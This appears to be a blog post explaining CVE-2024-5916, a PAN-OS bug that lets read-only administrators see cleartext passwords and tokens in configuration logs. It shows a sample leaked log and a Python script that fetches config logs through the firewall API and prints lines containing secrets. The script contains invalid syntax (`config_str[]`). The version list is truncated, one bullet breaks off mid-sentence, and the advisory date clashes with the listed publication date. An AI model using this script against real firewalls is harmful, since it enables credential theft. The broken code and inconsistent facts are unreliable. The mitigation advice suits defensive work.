CVE-2024-5916 - How a Palo Alto Networks PAN-OS Log Leak Lets Read-Only Admins Steal Secrets

On June 4, 2024, Palo Alto Networks shipped a security advisory for CVE-2024-5916—an information disclosure bug in its PAN-OS operating system. This flaw is important for anyone running Palo Alto firewalls: it means even limited “read-only” admins can accidentally view highly sensitive secrets like passwords and API tokens stored *in plain text* in configuration logs.

Unlike many security bugs, exploiting CVE-2024-5916 doesn’t need fancy hacking. If you’re a local admin (even a “read-only” one) and know where to look, passwords spill right onto your screen with a few clicks. In this post, you’ll learn how this happens, see sample code and log entries, and get references you can use to better protect your environment.

---

Background: What is PAN-OS and Who is Vulnerable?

Palo Alto's PAN-OS runs on most modern PAN firewalls. These devices often connect to external services—LDAP, SAML, TACACS, cloud APIs—to authenticate users, pull security updates, or provide single sign-on. To do that, admins store passwords, access tokens, or client secrets inside PAN-OS configuration.

Because device logs can store this sensitive info (to help admins diagnose configs), it's critical that only trusted users access logs. But due to CVE-2024-5916, even less trusted “read-only” admins can view the log contents, and extract secrets.

Affected versions:
- PAN-OS 10.1, 10.2, 11., 11.1 (check Advisory for minor version details)

Only local administrators with read-only access are pre-requisite for this.

---

Exploitation Details: How CVE-2024-5916 Leaks Secrets

This vulnerability is *not* remote code execution and *not* remotely exploitable. The attacker must have local admin credentials (even just read-only). Here's how the issue plays out in real life:

Sample Log Entry Snippet

2024/05/20 10:15:34 admin@PA-VM01
Configuration change: Set system ldap-server password = "SuperSecretP@sswrd"
Configuration change: Set system api-access-token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
Configuration change: Set system tacacs-server password = "ChangeThisNow2024"

This log entry is available even to read-only administrators. That means a junior admin or an intern (with “view only” rights) could quietly steal every external credential tied into your firewall system.

If you have API access as a read-only admin, you can automate this

import requests
from lxml import etree

# Replace with your own values
PAN_HOST = "https://firewall.local";
API_KEY = "PASTE_READ_ONLY_API_KEY_HERE"

def fetch_config_logs():
    url = f"{PAN_HOST}/api/?type=log&log-type=config&key={API_KEY}"
    r = requests.get(url, verify=False)
    return etree.fromstring(r.content)

def extract_secrets(xmlroot):
    for entry in xmlroot.xpath("//entry"):
        config_str = entry.xpath("config[1]/text()")
        if config_str:
            line = config_str[]
            if any(word in line.lower() for word in ["password", "token", "secret"]):
                print(line)

if __name__ == "__main__":
    logs_xml = fetch_config_logs()
    extract_secrets(logs_xml)

Note: Never run scripts like this in a production environment without proper permissions.

---

Why is This So Dangerous?

- Read-only != Trusted: Many organizations grant dozens of admins “read-only” rights for auditing or monitoring, not realizing this provides cleartext passwords/tokens.

- Secrets to External Systems: The leaked secrets can let a malicious actor

- Connect to LDAP/AD servers, SSO providers, cloud APIs, etc.

Move laterally, escalate privileges elsewhere, or access sensitive data.

- Hard to Detect: The leak doesn't create extra logs or alert the system owner—a rogue admin could quietly siphon off secrets without a trace.

---

Upgrade PAN-OS:

Palo Alto advises all customers to update affected PAN-OS versions immediately. Newer builds sanitize secrets in configuration logs.

Restrict Read-only Access:

Audit which users have “read-only” admin, API, or log access. Remove unnecessary accounts or reduce their privileges.

Rotate Secrets:

If you suspect exposure, change all stored passwords, tokens, and client secrets on external systems.

---

References

- Official Palo Alto Advisory: CVE-2024-5916
- Unit 42 Threat Brief (as available)
- Palo Alto Best Practices: Admin Roles & Log Monitoring

Keep your team informed: *If you rely on PAN-OS, review your permissions and logs today.* Vulnerabilities like CVE-2024-5916 may not be flashy, but their real-world impact can be devastating if attackers get even the lowest rung of admin access.


Stay safe!
If you have follow-up questions on CVE-2024-5916 or need more mitigation tips, reach out to Palo Alto support.

Timeline

Published on: 08/14/2024 17:15:18 UTC
Last modified on: 08/20/2024 19:30:11 UTC